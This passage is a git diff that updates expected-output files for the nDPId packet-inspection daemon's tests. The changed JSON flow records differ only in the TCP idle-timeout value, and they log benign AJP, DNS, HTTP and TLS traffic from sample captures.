-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":26,"total-skipped-flows":0,"total-l4-data-len":2594,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":39,"global_ts_msec":1505154584618} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/26 diff --git a/test/results/alexa-app.pcapng.out b/test/results/alexa-app.pcapng.out index dfb9b879e..e45caae99 100644 --- a/test/results/alexa-app.pcapng.out +++ b/test/results/alexa-app.pcapng.out @@ -33,11 +33,11 @@ 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024847,"flow_last_seen":1490976024847,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1490976024848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1490976024848,"pkt":"ePiC0\/vCAMDKkaPvCABFAABbz+1AAEARvaqsECoBrBAq2AA12UMAR0w654SBgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAABAAHADAABAAEAAAEYAASs2QmO"} 00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976024848,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.9.142"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024857,"flow_last_seen":1490976024857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976024857,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1490976024857,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024857,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8rxxAAEAG\/k+sECrYrNkJjutWAFC1gOcZAAAAAKAC\/\/\/pcgAAAgQFtAQCCAoA9kgFAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1490976024894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024894,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8rv4AADQGSm6s2QmOrBAq2ABQ61bhGRrktYDnGqASpajwtAAAAgQFZAQCCApVvgGZAPZIBQEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1490976024896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976024896,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0rx1AAEAG\/lasECrYrNkJjutWAFC1gOca4Rka5YAQAVfDfgAAAQEICgD2SAlVvgGZ"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976024857,"flow_last_seen":1490976024899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024899,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024857,"flow_last_seen":1490976024857,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976024857,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1490976024857,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024857,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8rxxAAEAG\/k+sECrYrNkJjutWAFC1gOcZAAAAAKAC\/\/\/pcgAAAgQFtAQCCAoA9kgFAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1490976024894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024894,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8rv4AADQGSm6s2QmOrBAq2ABQ61bhGRrktYDnGqASpajwtAAAAgQFZAQCCApVvgGZAPZIBQEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1490976024896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976024896,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0rx1AAEAG\/lasECrYrNkJjutWAFC1gOca4Rka5YAQAVfDfgAAAQEICgD2SAlVvgGZ"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976024857,"flow_last_seen":1490976024899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024899,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1490976027514,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976027514,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WktAAEARM2qsECrYrBAqAc\/EADUAKrjvz8MBAAABAAAAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAQ=="} 00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -48,23 +48,23 @@ 00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027523,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1490976027560,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1490976027560,"pkt":"ePiC0\/vCAMDKkaPvCABFAABr0NVAAEARvLKsECoBrBAq2AA1z8QAV0oUz8OBgAABAAIAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAcAMAAUAAQABUX8AEQxtb2JpbGUtZ3RhbGsBbMASwC4AAQABAAABKwAErcLfvA=="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976027560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.223.188"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027567,"flow_last_seen":1490976027567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027567,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1490976027567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027567,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81nRAAEAG\/9+sECrYrcLfvKd+FGxeQZ9gAAAAAKAC\/\/\/gAAAAAgQFtAQCCAoA9kkUAAAAAAEDAwg="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1490976027617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027617,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA86FEAACsGQwOtwt+8rBAq2BRsp36O4XTVXkGfYaASpajFDgAAAgQFZAQCCAor\/EXWAPZJFAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1490976027621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027621,"pkt":"AMDKkaPvePiC0\/vCCABFAAA01nVAAEAG\/+asECrYrcLfvKd+FGxeQZ9hjuF01oAQAVeX1wAAAQEICgD2SRkr\/EXW"} -01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027567,"flow_last_seen":1490976027625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976027625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01166{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976027567,"flow_last_seen":1490976027674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1490976027674,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027567,"flow_last_seen":1490976027567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027567,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1490976027567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027567,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81nRAAEAG\/9+sECrYrcLfvKd+FGxeQZ9gAAAAAKAC\/\/\/gAAAAAgQFtAQCCAoA9kkUAAAAAAEDAwg="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1490976027617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027617,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA86FEAACsGQwOtwt+8rBAq2BRsp36O4XTVXkGfYaASpajFDgAAAgQFZAQCCAor\/EXWAPZJFAEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1490976027621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027621,"pkt":"AMDKkaPvePiC0\/vCCABFAAA01nVAAEAG\/+asECrYrcLfvKd+FGxeQZ9hjuF01oAQAVeX1wAAAQEICgD2SRkr\/EXW"} +01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027567,"flow_last_seen":1490976027625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976027625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01166{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976027567,"flow_last_seen":1490976027674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1490976027674,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1490976027724,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027724,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Wk1AAEARM2qsECrYrBAqASjeADUAKB2sfT0BAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1490976027725,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1490976027725,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM0NhAAEARvM6sECoBrBAq2AA1KN4AOCjyfT2BgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAAEGAATYOtrE"} 00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027725,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 